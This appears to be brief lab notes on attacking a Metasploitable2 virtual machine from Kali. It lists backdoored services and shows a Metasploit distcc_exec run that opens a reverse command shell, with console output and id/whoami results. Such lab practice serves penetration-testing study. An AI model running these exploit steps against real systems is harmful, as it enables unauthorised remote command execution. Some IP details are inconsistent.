Kali: 192.168.0.20/24

MSFable: 192.168.0.51/24

vulnerable service:

  • samba ->user map_script
  • irc-> unreal_ircd_3281_backdoor
  • ftp-> vsftpd_234_backdoor
  • Services:Unintentional Backdoors 

    In addition to the malicious backdoors in the previous section, some services are almost backdoors by their very nature. The first of which installed on Metasploitable2 is distccd. This program makes it easy to scale large compiler jobs across a farm of like-configured systems. The problem with this service is that an attacker can easily abuse it to run a command of their choice, as demonstrated by the Metasploit module usage below.

     

    msfconsole

     

    msf > use exploit/unix/misc/distcc_exec

    msf  exploit(distcc_exec) > set RHOST 192.168.99.131

    msf  exploit(distcc_exec) > exploit

    msf > use exploit/unix/misc/distcc_exec
    msf exploit(distcc_exec) > show optionsModule options (exploit/unix/misc/distcc_exec):

    Name   Current Setting  Required  Description
    —-   —————  ——–  ———–
    RHOST                   yes       The target address
    RPORT  3632             yes       The target port

    Exploit target:

    Id  Name
    —  —-
    0   Automatic Target

    msf exploit(distcc_exec) > set rhost 192.168.0.51
    rhost => 192.168.0.51
    msf exploit(distcc_exec) > exploit

    [*] Started reverse TCP double handler on 192.168.0.30:4444
    [*] Accepted the first client connection…
    [*] Accepted the second client connection…
    [*] Command: echo 8gFZ6i8kVEx29A4c;
    [*] Writing to socket A
    [*] Writing to socket B
    [*] Reading from sockets…
    [*] Reading from socket B
    [*] B: “8gFZ6i8kVEx29A4c\r\n”
    [*] Matching…
    [*] A is input…
    [*] Command shell session 2 opened (192.168.0.30:4444 -> 192.168.0.51:57642) at 2016-04-20 21:36:24 -0400

    id
    uid=1(daemon) gid=1(daemon) groups=1(daemon)
    whoami
    daemon

 

Check out here: